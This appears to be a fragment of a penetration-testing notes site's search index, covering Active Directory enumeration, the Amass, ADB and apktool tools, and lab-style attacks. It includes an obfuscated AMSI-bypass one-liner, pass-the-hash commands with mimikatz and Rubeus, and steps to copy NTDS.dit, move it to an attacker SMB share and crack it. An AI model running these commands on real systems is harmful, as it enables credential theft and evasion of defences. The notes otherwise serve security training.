                        ","tags":["rsync","port 873"]},{"location":"acronyms/","title":"Acronyms","text":""},{"location":"acronyms/#a","title":"A","text":"Acronym Expression"},{"location":"acronyms/#b","title":"B","text":"Acronym Expression BFLA Broken Funtion Level Authorization BOLA Broken Access Level Authorization"},{"location":"acronyms/#c","title":"C","text":"Acronym Expression"},{"location":"acronyms/#d","title":"D","text":"Acronym Expression"},{"location":"acronyms/#e","title":"E","text":"Acronym Expression"},{"location":"acronyms/#f","title":"F","text":"Acronym Expression"},{"location":"acronyms/#g","title":"G","text":"Acronym Expression"},{"location":"acronyms/#h","title":"H","text":"Acronym Expression"},{"location":"acronyms/#i","title":"I","text":"Acronym Expression IGA Identity Governance and Administration ILM Identity Lifecycle Management"},{"location":"acronyms/#j","title":"J","text":"Acronym Expression"},{"location":"acronyms/#k","title":"K","text":"Acronym Expression"},{"location":"acronyms/#l","title":"L","text":"Acronym Expression"},{"location":"acronyms/#m","title":"M","text":"Acronym Expression"},{"location":"acronyms/#n","title":"N","text":"Acronym Expression"},{"location":"acronyms/#o","title":"O","text":"Acronym Expression OTP One Time Password"},{"location":"acronyms/#p","title":"P","text":"Acronym Expression"},{"location":"acronyms/#q","title":"Q","text":"Acronym Expression"},{"location":"acronyms/#r","title":"R","text":"Acronym Expression RBAC Role Based Access Control"},{"location":"acronyms/#s","title":"S","text":"Acronym Expression SOAP Simple Object Access Protocol SCIM System for Cross-domain Identity Management is a standard for automating the exchange of user identity information between service provider and identity providers. It helps with automating functions like provisioning or deprovisioning of users identities on applications integrated with the identity provider."},{"location":"acronyms/#t","title":"T","text":"Acronym Expression"},{"location":"acronyms/#u","title":"U","text":"Acronym Expression"},{"location":"acronyms/#v","title":"V","text":"Acronym Expression"},{"location":"acronyms/#w","title":"W","text":"Acronym Expression"},{"location":"acronyms/#x","title":"X","text":"Acronym Expression"},{"location":"acronyms/#y","title":"Y","text":"Acronym Expression"},{"location":"acronyms/#z","title":"Z","text":"Acronym Expression"},{"location":"active-directory-ldap/","title":"Active Directory - LDAP","text":"

                        Active Directory (AD) is a directory service for Windows network environments.

                        In the context of Active Directory, a forest is a collection of one or more domain trees that share a common schema and global catalog, while a domain is a logical unit within a forest that represents a security boundary for authentication and authorization purposes.

                        And what about LDAP? See here.

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#tools","title":"Tools","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#xfreerdp","title":"xfreerdp","text":"

                        See cheat sheet.

                        xfreerdp /v:$ip /u:htb-student /p:<password> /cert-ignore\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#rsat-remote-server-administration-tools","title":"RSAT (Remote Server Administration Tools)","text":"

                        RSAT (Remote Server Administration Tools) cheat sheet:

                        # Check if RSAT tools are installed\nGet-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State\n\n# Install all RSAT tools\nGet-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability \u2013Online\n\n# Install a specific RSAT tool, for instance Rsat.ActiveDirectory.DS-LDS.Tools \nAdd-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0  \u2013Online\n

                        Once installed, all of the tools will be available under: Control Panel> All Control Panel Items >Administrative Tools.

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypassing","title":"Bypassing","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypass-execution-policy","title":"Bypass Execution Policy","text":"
                        powershell -ep bypass\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypass-amsi","title":"Bypass AMSI","text":"
                        **S`eT-It`em ( 'V'+'aR' +\u00a0 'IA' + ('blE:1'+'q2')\u00a0 + ('uZ'+'x')\u00a0 ) ( [TYpE](\u00a0 \"{1}{0}\"-F'F','rE'\u00a0 ) )\u00a0 ;\u00a0 \u00a0 (\u00a0 \u00a0 Get-varI`A`BLE\u00a0 ( ('1Q'+'2U')\u00a0 +'zX'\u00a0 )\u00a0 -VaL\u00a0 ).\"A`ss`Embly\".\"GET`TY`Pe\"((\u00a0 \"{6}{3}{1}{4}{2}{0}{5}\" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')\u00a0 ) ).\"g`etf`iElD\"(\u00a0 ( \"{0}{2}{1}\" -f('a'+'msi'),'d',('I'+'nitF'+'aile')\u00a0 ),(\u00a0 \"{2}{4}{0}{1}{3}\" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'\u00a0 )).\"sE`T`VaLUE\"(\u00a0 ${n`ULl},${t`RuE} )**\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#run-a-utility-as-another-user","title":"Run a utility as another user","text":"
                        # Run a utility as another user\nrunas /netonly /user:htb.local\\jackie.may powershell\n\n# Run an utility as another user with rubeus. Passing clear text credentials\nrubeus.exe asktgt /user:jackie.may /domain:htb.local /dc:10.10.110.100 /rc4:ad11e823e1638def97afa7cb08156a94\n\n# Run an utility as another user with mimikatz.exe. Passing clear text credentials\nmimikatz.exe sekurlsa::pth /domain:htb.local /user:jackie.may /rc4:ad11e823e1638def97afa7cb08156a94\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#enumeration","title":"Enumeration","text":"

                        Basic reconnaissance:\u00a0Who I am, where I am and what permissions I have.

                        whoami\nhostname\nnet localgroup administrators\n\n# View a user's current rights\nwhoami /priv\n

                        Tool for enumeration:

                        • Enumeration with LDAP queries
                        • PowerView.ps1 from PowerSploit project (powershell).
                        • The ActiveDirectory PowerShell module (powershell).
                        • BloodHound (C# and PowerShell Collectors).
                        • SharpView (C#).

                        A basic AD user account with no added privileges can be used to enumerate the majority of objects contained within AD, including but not limited to:

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#1-domain-computers","title":"1. Domain Computers","text":"
                        # Use ADSI to search for all computers\n([adsisearcher]\"(&(objectClass=Computer))\").FindAll()\n\n#Query for installed software\nget-ciminstance win32_product \\| fl\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#2-domain-users","title":"2. Domain Users","text":"

                        Two ways. First, if we compromise a domain-joined system (or a client has you perform an AD assessment from one of their workstations) we can leverage RSAT to enumerate AD (Active Directory Users and Computers and ADSI Edit modules). Second, we can enumerate the domain from a non-domain joined host (provided that it is in a subnet that communicates with a domain controller) by launching any RSAT snap-ins using \"runas\" from the command line.

                        # Gets one or more Active Directory users.\nGet-ADUser\n\n# List disabled users\nGet-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select name\n\n# Count all users in an OU\n(Get-ADUser -SearchBase \"OU=Employees,DC=INLANEFREIGHT,DC=LOCAL\" -Filter *).count\n

                        We can also open the MMC Console from a non-domain joined computer using the following command syntax (See here how to deal with following steps the MMC interface):

                        runas /netonly /user:Domain_Name\\Domain_USER mmc\n

                        Also, NT Authority/System is a LocalSystem account built-in in Windows operating systems, used by the service control manager. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. The only real limitation is not being able to perform cross-trust Kerberos attacks such as Kerberoasting ( See techniques to gain SYSTEM-level access on a host).

                        Enumerating with powerview.ps1

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#3-domain-group-information","title":"3. Domain Group Information","text":"
                        # Get all administrative groups \nGet-ADGroup -Filter \"adminCount -eq 1\" \\| select Name\n\n# LDAP query to return all AD groups\nGet-ADObject -LDAPFilter '(objectClass=group)' \\| select cn\n\n# Get AD groups using WMI \nGet-WmiObject -Class win32_group -Filter \"Domain='INLANEFREIGHT'\"\n\n# Get information about an specific AD group\nGet-ADGroup -Identity \"<GROUP NAME>\" -Properties *\n

                        Domain Groups of interest:

                        Get-ADGroup -Identity \"<GROUP NAME>\" -Properties *\n

                        These are some groups with special permissions that, if missconfigured, might be exploited:

                        # Schema Admins | The Schema Admins group is a high privileged group in a forest root domain. The membership of this group must be limited. This group is use to modify the schema of forest. Additional accounts must only be added when changes to the schema are necessary and then must be removed. By default, the Administrator account is a member of this group. Because this group has significant power in the forest, add users with caution. Members can modify the Active Directory schema structure and can backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.\nGet-ADGroup -Identity \"Schema Admins\" -Properties *\n\n# Default Administrators | Domain Admins and Enterprise Admins \"super\" groups. A built-in group . Grants complete and unrestricted access to the computer, or if the computer is promoted to a domain controller, members have unrestricted access to the domain. This group cannot be renamed, deleted, or moved. This built-in group controls access to all the domain controllers in its domain, and it can change the membership of all administrative groups. Membership can be modified by members of the following groups: the default service Administrators, Domain Admins in the domain, or Enterprise Admins.\nGet-ADGroup -Identity \"Administrators\" -Properties *\n\n# Server Operators | A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. Members can modify services, access SMB shares, and backup files. \nGet-ADGroup -Identity \"Server Operators\" -Properties *\n\n# Backup Operators | A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down. Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs. \nGet-ADGroup -Identity \"Backup Operators\" -Properties *\n\n# Print Operators | A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues. They can also manage Active Directory printer objects in the domain. Members of this group can locally sign in to and shut down domain controllers in the domain. Because members of this group can load and unload device drivers on all domain controllers in the domain, add users with caution. This group cannot be renamed, deleted, or moved. Members are allowed to logon to DCs locally and \"trick\" Windows into loading a malicious driver. \nGet-ADGroup -Identity \"Print Operators\" -Properties *\n\n# Hyper-V Administrators | Members of the Hyper-V Administrators group have complete and unrestricted access to all the features in Hyper-V. Adding members to this group helps reduce the number of members required in the Administrators group, and further separates access. If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.\nGet-ADGroup -Identity \"Hyper-V Administrators\" -Properties *\n\n# Account Operators | Grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers. Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights. Members can modify non-protected accounts and groups in the domain. \nGet-ADGroup -Identity \"Account Operators\" -Properties *\n\n# Remote Desktop Users | The Remote Desktop Users group on an RD Session Host server is used to grant users and groups permissions to remotely connect to an RD Session Host server. This group cannot be renamed, deleted, or moved. It appears as a SID until the domain controller is made the primary domain controller and it holds the operations master role (also known as flexible single master operations or FSMO). Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.\nGet-ADGroup -Identity \"Remote Desktop Users\" -Properties *\n\n# Remote Management Users | Members of the Remote Management Users group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. The Remote Management Users group is generally used to allow users to manage servers through the Server Manager console, whereas the WinRMRemoteWMIUsers_ group is allows remotely running Windows PowerShell commands. Members are allowed to logon to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs). \nGet-ADGroup -Identity \"Remote Management Users\" -Properties *\n\n# Group Policy Creator Owners | A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator. The default owner of a new Group Policy object is usually the user who created it. If the user is a member of Administrators or Domain Admins, all objects that are created by the user are owned by the group. Owners have full control of the objects they own. Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.\nGet-ADGroup -Identity \"Group Policy Creator Owners\" -Properties *\n\n# DNSAdmins | Members of this group have administrative access to the DNS Server service. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group has no default members. Members have the ability to load a DLL on a DC but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.\nGet-ADGroup -Identity \"DNSAdmins\" -Properties *\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#4-default-domain-policy","title":"4. Default Domain Policy","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#5-domain-functional-levels","title":"5. Domain Functional Levels","text":"
                        # Get hostnames with the word \"SQL\" in their hostname \nGet-ADComputer  -Filter \"DNSHostName -like 'SQL*'\"` \n

                        6. Password Policy

                        7. Group Policy Objects (GPOs)

                        8. Kerberos Delegation

                        # Find admin users that don't require Kerberos Pre-Auth\nGet-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'}\n

                        9. Domain Trusts

                        10. Access Control Lists (ACLs)

                        #  Enumerate UAC values for admin users\nGet-ADUser -Filter {adminCount -gt 0} -Properties admincount,useraccountcontrol \n

                        11. Remote access rights

                        Active Directory can be easily misconfigurable. These are common attacks:

                        • Kerberoasting / ASREPRoasting
                        • NTLM Relaying
                        • Network traffic poisoning
                        • Password spraying
                        • Kerberos delegation abuse
                        • Domain trust abuse
                        • Credential theft
                        • Object control
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#cheat-sheet-so-far","title":"Cheat sheet so far","text":"Command Description xfreerdp /v:$ip /u:htb-student /p:<password> RDP to lab target Get-ADGroup -Identity \"<GROUP NAME\"> -Properties * Get information about an AD group whoami /priv View a user's current rights Get-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State Check if RSAT tools are installed Get-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability \u2013Online Install all RSAT tools runas /netonly /user:htb.local\\jackie.may powershell Run a utility as another user Get-ADObject -LDAPFilter '(objectClass=group)' \\| select cn LDAP query to return all AD groups Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' \\| select name List disabled users (Get-ADUser -SearchBase \"OU=Employees,DC=INLANEFREIGHT,DC=LOCAL\" -Filter *).count Count all users in an OU get-ciminstance win32_product \\| fl Query for installed software Get-ADComputer -Filter \"DNSHostName -like 'SQL*'\" Get hostnames with the word \"SQL\" in their hostname Get-ADGroup -Filter \"adminCount -eq 1\" \\| select Name Get all administrative groups Get-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'} Find admin users that don't require Kerberos Pre-Auth Get-ADUser -Filter {adminCount -gt 0} -Properties admincount,useraccountcontrol Enumerate UAC values for admin users Get-WmiObject -Class win32_group -Filter \"Domain='INLANEFREIGHT'\" Get AD groups using WMI ([adsisearcher]\"(&(objectClass=Computer))\").FindAll() Use ADSI to search for all computers","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#acronyms","title":"Acronyms","text":"

                        ADSI

                        Active Directory Service Interfaces (ADSI) is a set of COM interfaces used to access the features of directory services from different network providers. ADSI is used in a distributed computing environment to present a single set of directory service interfaces for managing network resources. Administrators and developers can use ADSI services to enumerate and manage the resources in a directory service, no matter which network environment contains the resource. ADSI enables common administrative tasks, such as adding new users, managing printers, and locating resources in a distributed computing environment.

                        CIM The Common Information Model (CIM) is the Distributed Management Task Force (DMTF) standard [DSP0004] for describing the structure and behavior of managed resources such as storage, network, or software components. One way to describe CIM is to say that it allows multiple parties to exchange management information about these managed elements. However, this falls short of fully capturing CIM's ability not only to describe these managed elements and the management information, but also to actively control and manage them. By using a common model of information, management software can be written once and work with many implementations of the common model without complex and costly conversion operations or loss of information.

                        DIT Directory Information Tree.

                        MMC You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system.

                        OU

                        What is an organizational unit in Active Directory? An OU is a container within a Microsoft Windows Active Directory (AD) domain that can hold users, groups and computers. It is the smallest unit to which an administrator can assign Group Policy settings or account permissions.

                        RSAT

                        The Remote Server Administration Tools (RSAT) have been part of Windows since the days of Windows 2000. RSAT allows systems administrators to remotely manage Windows Server roles and features from a workstation running Windows 10, Windows 8.1, Windows 7, or Windows Vista. RSAT can only be installed on Professional or Enterprise editions of Windows.

                        SID

                        In the context of the Microsoft Windows NT line of operating systems, a Security Identifier is a unique, immutable identifier of a user, user group, or other security principal.

                        SPN

                        A service principal name (SPN) is\u00a0a unique identifier of a service instance. Kerberos authentication uses SPNs to associate a service instance with a service sign-in account. Doing so allows a client application to request service authentication for an account even if the client doesn't have the account name.

                        UAC

                        User Account Control (UAC) is a fundamental component of Microsoft's overall security vision. UAC helps mitigate the impact of malware.

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#attacking-active-directory","title":"Attacking Active Directory","text":"

                        Once a Windows system is joined to a domain, it will no longer default to referencing the SAM database to validate logon requests. That domain-joined system will now send all authentication requests to be validated by the domain controller before allowing a user to log on.

                        If needed, use tools like username Anarchy to create list of usernames.

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#1-dumping-ntdsdit","title":"1. Dumping ntds.dit","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#dumping-ntdsdit-locally","title":"Dumping ntds.dit locally","text":"

                        NT Directory Services (NTDS) is the directory service used with AD to find & organize network resources. Recall that NTDS.dit file is stored at %systemroot$/ntds on the domain controllers in a forest.

                        The .dit stands for directory information tree. This is the primary database file associated with AD and stores all domain usernames, password hashes, and other critical schema information. If this file can be captured, we could potentially compromise every account on the domain

                        # Connect to a DC with Evil-WinRM\nevil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'\n\n# To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights. Check Local Group Membership:\n*Evil-WinRM* PS C:\\> net localgroup\n\n# Check User Account Privileges including Domain. If the account has both Administrators and Domain Administrator rights, this means we can do just about anything we want, including making a copy of the NTDS.dit file.\nnet user <username>\n\n# Use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD. Create a Shadow Copy of C:\n*Evil-WinRM* PS C:\\> vssadmin CREATE SHADOW /For=C:\n\n# Copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.\n*Evil-WinRM* PS C:\\NTDS> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit\n

                        Launch smbserver in our attacker machine:

                        sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

                        Now, from PS in the victim's windows machine:

                        # Transfer the file to attacker machine\ncmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n

                        And... crack the hash with hashcat:

                        sudo hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#dumpins-ntdsdit-remotely","title":"Dumpins ntds.dit remotely","text":"
                        crackmapexec smb $ip -u <username> -p <password> --ntds\n
                        ","tags":["active directory","ldap","windows"]},{"location":"activedirectory-powershell-module/","title":"The ActiveDirectory PowerShell module","text":"

                        The Active Directory module for Windows PowerShell is a PowerShell module that consolidates a group of cmdlets. You can use these cmdlets to manage your Active Directory domains, Active Directory Lightweight Directory Services (AD LDS) configuration sets, and Active Directory Database Mounting Tool instances in a single, self-contained package.

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#installation","title":"Installation","text":"

                        Download from The ActiveDirectory PowerShell module github repository

                        This module is Microsoft signed and works even in PowerShell Constrained Language Mode (CLM).

                        Import-Module .\\ADModule-master\\Microsoft.ActiveDirectory.Management.dll\u00a0\n\nImport-Module .\\ADModule-master\\ActiveDirectory\\ActiveDirectory.psd1\u00a0\n

                        Also, you can copy the DLL from the github repo to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges.

                        Import-Module C:\\ADModule\\Microsoft.ActiveDirectory.Management.dll -Verbose\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#basic-commands","title":"Basic commands","text":"
                        # Get ACL for a folder (or a file)\nGet-ACL \u201cC:\\Users\\Public\\Desktop\u201d\n\n# Search for AD elements. [See more in ldap queries](ldap.md)\nGet-ADObject -LDAPFilter <thespecificfilter>\n\n# Count occurrences in a query, like the one above.\n(Get-ADObject -LDAPFilter <thespecificfilter>\n).count\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-aduser","title":"Get-ADUser","text":"

                        More on https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps.

                        # This command gets all users in the container OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM.\nGet-ADUser -Filter * -SearchBase \"OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM\"\n\n# This command gets all users that have a name that ends with SvcAccount:\nGet-ADUser -Filter 'Name -like \"*SvcAccount\"' | Format-Table Name,SamAccountName -A\n\n# This command gets all of the properties of the user with the SAM account name ChewDavid:\nGet-ADUser -Identity ChewDavid -Properties *\n\n# This command gets the user with the name ChewDavid in the Active Directory Lightweight Directory Services (AD LDS) instance:\nGet-ADUser -Filter \"Name -eq 'ChewDavid'\" -SearchBase \"DC=AppNC\" -Properties \"mail\" -Server lds.Fabrikam.com:50000\n\n# This command gets all enabled user accounts in Active Directory using an LDAP filter:\nGet-ADUser -LDAPFilter '(!userAccountControl:1.2.840.113556.1.4.803:=2)'\n\n# search for all administrative users with the `DoesNotRequirePreAuth` attribute set, meaning that they can be ASREPRoasted:\nGet-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'}\n\n# Find all administrative users with the SPN \"servicePrincipalName\" attribute set, meaning that they can likely be subject to a Kerberoasting attack\nGet-ADUser -Filter \"adminCount -eq '1'\" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adcomputer","title":"Get-ADComputer","text":"
                        # Search domain computers for interesting hostnames. SQL servers are a particularly juicy target on internal assessments. The below command searches all hosts in the domain using `Get-ADComputer`, filtering on the `DNSHostName` property that contains the word `SQL`\nGet-ADComputer  -Filter \"DNSHostName -like 'SQL*'\"\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adgroup","title":"Get-ADGroup","text":"
                        # Search for administrative groups by filtering on the `adminCount` attribute. If set to `1`, it's protected by AdminSDHolder and known as protected groups. `AdminSDHolder` is owned by the Domain Admins group. It has the privileges to change the permissions of objects in Active Directory. \nGet-ADGroup -Filter \"adminCount -eq 1\" | select Name\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adobject","title":"Get-ADObject","text":"","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"amass/","title":"Amass","text":"

                        In depth DNS Enumeration and network mapping. Amass combines active and passive fingerprinting so being concious about this is really important. It's a assessment tool with reporting features.

                        ","tags":["dns enumeration","enumeration","tools"]},{"location":"amass/#install","title":"Install","text":"
                        apt install snapd\nservice snapd start\nsnap install amass\n

                        Before diving into using Amass, we should make the most of it by adding API keys to it.

                        1. First, we can see which data sources are available for Amass (paid and free) by running:

                        amass enum -list \n

                        2. Next, we will need to create a config file to add our API keys to.

                        sudo curl https://raw.githubusercontent.com/OWASP/Amass/master/examples/config.ini >~/.config/amass/config.ini\n

                        3. Now, see the file ~/.config/amass/config.ini and register in as many services as you can. Once you have obtained your API ID and Secret, edit the config.ini file and add the credentials to the file.

                        sudo nano ~/.config/amass/config.ini\n

                        4. Now, edit the file to add the sources. It is recommended to add:

                        • censys.io: guesswork out of understanding and protecting your organization\u2019s digital footprint.
                        • https://asnlookup.com: Quickly lookup updated information about specific Autonomous System Number (ASN), Organization, CIDR, or registered IP addresses (IPv4 and IPv6) among other relevant data. We also offer a free and paid API access!
                        • https://otx.alienvault.com: Quickly identify if your endpoints have been compromised in major cyber attacks using OTX Endpoint Security and many other.
                        • https://bigdatacloud.com
                        • https://cloudflare.com
                        • https://www.digicert.com/tls-ssl/certcentral-tls-ssl-manager:
                        • https://fullhunt.io
                        • https://github.com
                        • https://ipdata.co
                        • https://leakix.net
                        • as many more as you can.

                        5. When ready, we can run amass:

                        ","tags":["dns enumeration","enumeration","tools"]},{"location":"amass/#basic-usage","title":"Basic usage","text":"
                        amass enum -active -d crapi.apisec.ai  -ip -brute -dir path/to/save/results/\n# enum: Perform ACTIVE  enumerations and network mapping\n# -ip: Show ip addresses of cached subdomais.\n# -brute: Perform a brute force dns attack.\n\namass enum -passive -d crapi.apisec.ai -src  -dir path/to/save/results/\n# enum: Perform PASSIVE enumerations and network mapping.\n# src: display sources of the host domain.\n# -dir: Specify a folder to save results.\n\namass intel -d crapi.apisec.ai\n# intel: Discover targets for enumerations. Passive fingerprinting.\n

                        Some flags:

                        -active: Attempt zone transfer and certificate name grabs.\n-pasive: Passive fingerprinting.\n-bl: Blacklist of subdomain names that will not be investigated\n-d: to specify a domain\n-ip: Show ip addresses of cached subdomais.\n\u2013include-unresolvable: output DNS names that did not resolve.\n-o file.txt: To output the result into a file\n-w: path to a different wordlist file\n

                        Also, to be more precise:

                        amass enum -active -d <target> | grep api\n# amass enum -active -d microsoft.com | grep api\n

                        Amass has several useful command-line options. Use the intel command to collect SSL certificates, search reverse Whois records, and find ASN IDs associated with your target. Start by providing the command with target IP addresses

                        amass intel -addr [target IP addresses]\n

                        If this scan is successful, it will provide you with domain names. These domains can then be passed to intel with the whois option to perform a reverse Whois lookup:

                        amass intel -d [target domain] \u2013whois\n

                        This could give you a ton of results. Focus on the interesting results that relate to your target organization. Once you have a list of interesting domains, upgrade to the enum subcommand to begin enumerating subdomains. If you specify the -passive option, Amass will refrain from directly interacting with your target:

                        amass enum -passive -d [target domain]\n

                        The active enum scan will perform much of the same scan as the passive one, but it will add domain name resolution, attempt DNS zone transfers, and grab SSL certificate information:

                        amass enum -active -d [target domain]\n

                        To up your game, add the -brute option to brute-force subdomains, -w to specify the API_superlist wordlist, and then the -dir option to send the output to the directory of your choice:

                        amass enum -active -brute -w /usr/share/wordlists/API_superlist -d [target domain] -dir [directory name]  \n
                        ","tags":["dns enumeration","enumeration","tools"]},{"location":"android-debug-bridge/","title":"Android Debug Bridge - ADB","text":"

                        ADB or Android Debug Bridge is a command-line tool developed to facilitate communication between a computer and a connected emulator or Android device. ADB works with the aid of three components called Client, Daemon, and Server.

                        • Client: It\u2019s is very computer on which you use a command-line terminal to issue an ADB command. which sends commands.
                        • Daemon: Or, ADBD is a background process that runs on both connected devices. It\u2019s responsible for running commands on a connected emulator or Android device.
                        • Server: It runs in the background and works as a bridge between the Client and the Daemon and manages the communication. which manages communication between the client and the daemon.
                        ","tags":["mobile pentesting"]},{"location":"android-debug-bridge/#basic-commands","title":"Basic commands","text":"
                        # Activate remote shell command console on the connected Android smartphone or tablet.\nadb shell\n\n# List Android devices connected to your computer\nadb devices\n# -l: to list devices by model or product number\n\n# Connect to device\nadb connect\n\n# List Android devices connected and emulators in your computer\nshow devices\n\n# Remove a package\npm uninstall --user 0 com.package.name\n\n# Remove a package but leave app data \npm uninstall -k --user 0 com.package.name\n# -k: Keep the app data and cache after package removal\n\n# Reinstall an uninstalled system app\ncmd package install-existing com.package.name\n
                        ","tags":["mobile pentesting"]},{"location":"android-debug-bridge/#howtos","title":"Howtos","text":"
                        • Remove bloatware from android device.
                        ","tags":["mobile pentesting"]},{"location":"apktool/","title":"apktool","text":"","tags":["mobile pentesting","tools"]},{"location":"apktool/#installation","title":"Installation","text":"

                        Go to your tool folder and download the tool:

                        wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.6.0.jar\n

                        Have the device from genymotion already running on Host-Only mode + NAT.

                        Have your kali on Host-Only mode + NAT.

                        Run:

                        adb connect <the device Host-Only IP>:5555\n\n#Making sure that genymotion is not using a proxy:\nadb shell-settings put global http_proxy :0\n\n# Installing the app\nadb install nameOfApp\n

                        To decompile and see source code:

                        java-jar apktool_2.6.0.jar d -s nameOfApp\n# d: decompile\n# -s: source.\n

                        When decompiled, a folder is created. If you go into the folder you will see the file classes.dex, which contains the source code. To see it:

                        jadx-gui\n
                        ","tags":["mobile pentesting","tools"]},{"location":"apt-packet-manager/","title":"Package Manager (APT)","text":"
                        # Search for a package or text string:\napt search <text_string>\n\n# Show package information:\napt show <package>\n\n# Show package dependencies:\napt depends <package>\n\n# Show the names of all the packages installed in the system:\napt list --installed\n\n# Install a package:\napt install <package>\n\n# Uninstall a package:\napt remove <package>\n\n# Delete a package including its configuration files:\napt purge <package>\n\n# Delete automatically those packages that are not being used (be careful with this command, due to apt's hell dependency it may delete unwanted packages):\napt autoremove\n\n# Update the repositories information:\napt update\n\n# Update a package to the last available version in the repository:\napt upgrade <package>\n\n# Update the full distribution. It will update our system to the next available version:\napt upgrade -y\n\n# Clean caches, downloaded packages, etc:\napt clean && apt autoclean\n
                        ","tags":["bash"]},{"location":"aquatone/","title":"Aquatone - Automatize web scanner in large subdomain lists","text":"

                        Aquatone is a tool for automatic and visual inspection of websites across many hosts and is convenient for quickly gaining an overview of HTTP-based attack surfaces by scanning a list of configurable ports, visiting the website with a headless Chrome browser, and taking a screenshot. This is helpful, especially when dealing with huge subdomain lists.

